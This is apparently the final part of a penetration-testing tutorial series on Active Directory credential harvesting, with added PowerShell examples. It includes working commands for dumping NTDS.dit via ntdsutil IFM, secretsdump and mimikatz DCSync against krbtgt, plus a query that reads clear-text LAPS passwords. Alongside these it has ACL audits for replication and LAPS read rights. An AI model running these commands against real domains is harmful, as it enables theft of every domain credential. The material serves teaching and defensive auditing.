Credential Harvesting (Part 3)

Domain Controller

NT Directory Services (NTDS) is the Active Directory database. It holds every directory object, its attributes and the password hashes used for authentication. On a domain controller it is stored in the file NTDS.dit (by default C:\Windows\NTDS\ntds.dit) and is organised into three main tables:
  1. Schema table: the definitions of every object class and attribute, and the relationships between them.
  2. Link table: linked attributes, such as group membership (member/memberOf), stored as links between objects.
  3. Data table: the objects themselves (users, groups, computers and so on) with their attribute values, including the stored credentials.

The hashes in the data table are encrypted with a Password Encryption Key (PEK) that is itself encrypted with the boot key held in the SYSTEM registry hive. That is why any offline dump of NTDS.dit also needs a copy of the SYSTEM hive from the same machine.

Ntdsutil is a built-in Windows command-line tool for managing and maintaining Active Directory Domain Services. It can be used to:

  1. Restore deleted objects in AD.
  2. Perform maintenance (integrity checks, compaction) on the AD database.
  3. Create and manage AD snapshots.
  4. Set the Directory Services Restore Mode (DSRM) administrator password.
  5. Create an Install From Media (IFM) set, which copies a consistent NTDS.dit together with the SYSTEM and SECURITY hives. This is the function attackers with DC admin rights abuse to dump credentials locally.

Local dumping is used when the tester already has administrative access to a domain controller but not the credentials of other accounts: an IFM set created with ntdsutil (or a volume shadow copy of the NTDS folder) yields NTDS.dit and the SYSTEM hive, which are then parsed offline. The other common route is DCSync, which dumps credentials remotely without touching the DC's disk. Any account holding the replication extended rights on the domain naming context (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) can ask a DC to replicate account secrets exactly as another DC would; Mimikatz (lsadump::dcsync) and Impacket's secretsdump implement this. By default only Domain Controllers, Enterprise Domain Controllers and the built-in Administrators group hold these rights, so the penetration tester enumerates who else has been granted them and leverages such an account to perform domain replication.
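The following is an added example, not code from the original post. It shows the two routes just described: the local IFM dump with ntdsutil followed by offline extraction, and the check a tester (or defender) runs to see which principals hold the replication rights that make DCSync possible. It assumes the ActiveDirectory RSAT module is installed, the domain is named corp.local, the DC is dc01.corp.local, the output folder is C:\ifm and the account svc_backup exists; all of those names are assumptions for illustration.

```powershell
# Added example; not from the original post. Assumes RSAT ActiveDirectory module,
# domain corp.local, DC dc01.corp.local, output path C:\ifm (all assumed names).

# 1) Local dump: run on the DC as an administrator. Ntdsutil's IFM ("install from
#    media") set contains a consistent NTDS.dit plus the registry hives needed to
#    derive the PEK and decrypt the stored hashes.
ntdsutil "activate instance ntds" "ifm" "create full C:\ifm" "quit" "quit"
# Produces C:\ifm\Active Directory\ntds.dit and C:\ifm\registry\SYSTEM (and SECURITY).
# Offline extraction with Impacket, from any host the files are copied to:
#   secretsdump.py -ntds "C:\ifm\Active Directory\ntds.dit" -system C:\ifm\registry\SYSTEM LOCAL

# 2) Remote dump (DCSync) needs no logon to the DC, only replication rights:
#   secretsdump.py corp.local/svc_backup:'<password>'@dc01.corp.local -just-dc
#   mimikatz: lsadump::dcsync /domain:corp.local /user:krbtgt
# Check who has been granted those rights on the domain head. Replication is
# granted as extended rights identified by these well-known rightsGuid values.
$ReplRights = @{
  '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
  '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
  '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

Import-Module ActiveDirectory          # also creates the AD: PSDrive used by Get-Acl
$DomainDN = (Get-ADDomain).DistinguishedName
$Acl = Get-Acl -Path "AD:\$DomainDN"

$Acl.Access |
  Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll' -and
    # an empty ObjectType means "all extended rights" (or GenericAll), which includes replication
    ($ReplRights.ContainsKey($_.ObjectType.ToString()) -or $_.ObjectType -eq [guid]::Empty)
  } |
  ForEach-Object {
    $right = if ($_.ObjectType -eq [guid]::Empty) { 'All extended rights / GenericAll' }
             else { $ReplRights[$_.ObjectType.ToString()] }
    [pscustomobject]@{ Principal = $_.IdentityReference.Value; Right = $right }
  } |
  Sort-Object Principal, Right -Unique |
  Format-Table -AutoSize
```

On a default domain the second part lists only BUILTIN\Administrators, Domain Controllers, Enterprise Domain Controllers and Enterprise Read-only Domain Controllers (the latter with the filtered-set right only). Any other principal in the output, in particular a service account, can run DCSync against every account including krbtgt, so it is both the tester's target and the defender's finding. Note that the listing shows direct ACEs; a user reaches these rights through group membership, so resolve group members before concluding nobody unexpected has them.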

Local Administrator Password Solution (LAPS)

Every Windows installation has a built-in local Administrator account protected by a password. Rotating that password regularly across a large fleet is hard, so administrators commonly used Group Policy Preferences (GPP) to set the local administrator password on all workstations at once.

A GPP that sets local account passwords writes XML files (for example Groups.xml) into the SYSVOL share, which every domain user can read. The password in those files was only AES-encrypted, with a key that Microsoft itself published, so anyone on the domain could recover it. Microsoft removed the ability to set passwords through GPP in 2014 (MS14-025) and in 2015 released the Local Administrator Password Solution (LAPS), a far more secure way to manage local administrator passwords remotely. The patch did not delete existing XML files, so a cpassword value may still be found in SYSVOL on older domains.

LAPS adds two attributes to computer objects in AD: ms-Mcs-AdmPwd, which holds the clear-text password of the local administrator, and ms-Mcs-AdmPwdExpirationTime, which holds the time at which the password will next be reset. The password attribute is marked confidential, so only principals explicitly granted read access to it (typically Domain Admins and delegated help-desk groups) can read it. Anyone who can read it, or who holds GenericAll or all extended rights on the OU containing the computers, effectively has local administrator on those machines. Beyond dumping secrets from disk and memory, other common techniques for obtaining credentials in an Active Directory environment include:
  1. Kerberoasting.
  2. AS-REP Roasting.
  3. SMB Relay Attack.
  4. LLMNR/NBNS Poisoning.
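The following is an added example for the LAPS section above, not code from the original post. It first reads the LAPS attributes the current account is allowed to see, then audits which principals are granted read on ms-Mcs-AdmPwd at the OU level, the check that tells a tester (or an administrator) who can pull every local administrator password in that OU. It assumes the ActiveDirectory RSAT module, the legacy LAPS schema (ms-Mcs-AdmPwd) and the OU OU=Workstations,DC=corp,DC=local; the OU name is an assumption for illustration.

```powershell
# Added example; not from the original post. Assumes RSAT ActiveDirectory module,
# legacy LAPS schema and the OU below (assumed name).
Import-Module ActiveDirectory
$OU = 'OU=Workstations,DC=corp,DC=local'

# 1) Which computers in the OU expose a password readable by the current account?
#    ms-Mcs-AdmPwd is clear text; ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME.
#    The filter keeps only computers that actually have LAPS managing them.
Get-ADComputer -SearchBase $OU -Filter 'ms-Mcs-AdmPwdExpirationTime -like "*"' `
    -Properties 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime' |
  ForEach-Object {
    [pscustomobject]@{
      Computer = $_.Name
      # confidential attribute: absent from the result when the caller lacks read rights
      Password = if ($_.'ms-Mcs-AdmPwd') { $_.'ms-Mcs-AdmPwd' } else { '<not readable>' }
      Expires  = [datetime]::FromFileTimeUtc([int64]$_.'ms-Mcs-AdmPwdExpirationTime')
    }
  } | Format-Table -AutoSize

# 2) Who is granted read on ms-Mcs-AdmPwd at the OU? Look the attribute's schemaIDGUID
#    up in the schema instead of hard-coding it, then match ACEs that allow reading it.
$SchemaDN   = (Get-ADRootDSE).schemaNamingContext
$AdmPwdAttr = Get-ADObject -SearchBase $SchemaDN `
                -Filter 'lDAPDisplayName -eq "ms-Mcs-AdmPwd"' -Properties schemaIDGUID
$AdmPwdGuid = [guid]::new([byte[]]$AdmPwdAttr.schemaIDGUID)

(Get-Acl -Path "AD:\$OU").Access |
  Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    # empty ObjectType = rights over every attribute / all extended rights
    ($_.ObjectType -eq $AdmPwdGuid -or $_.ObjectType -eq [guid]::Empty) -and
    # reading a confidential attribute needs ExtendedRight (control access) as well as ReadProperty;
    # GenericAll covers both
    $_.ActiveDirectoryRights -match 'ReadProperty|ExtendedRight|GenericAll'
  } |
  Select-Object @{n = 'Principal'; e = { $_.IdentityReference.Value } },
                @{n = 'Rights';    e = { $_.ActiveDirectoryRights } },
                @{n = 'Scope';     e = { if ($_.ObjectType -eq [guid]::Empty) { 'all attributes' } else { 'ms-Mcs-AdmPwd' } } } |
  Sort-Object Principal -Unique |
  Format-Table -AutoSize
```

Expected on a well-configured domain: part 1 shows `<not readable>` for a normal user, and part 2 lists only Domain Admins, SYSTEM and the deliberately delegated group. A help-desk or "Workstation Admins" group with GenericAll on the OU, or a broad ExtendedRight grant with an empty ObjectType, shows up here and means every LAPS password in the OU is exposed to that group. The newer Windows LAPS (built into Windows since 2023) stores the password in msLAPS-Password and msLAPS-PasswordExpirationTime instead, so substitute those names when auditing a domain that has migrated.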

Conclusion:

This concludes the credential harvesting series.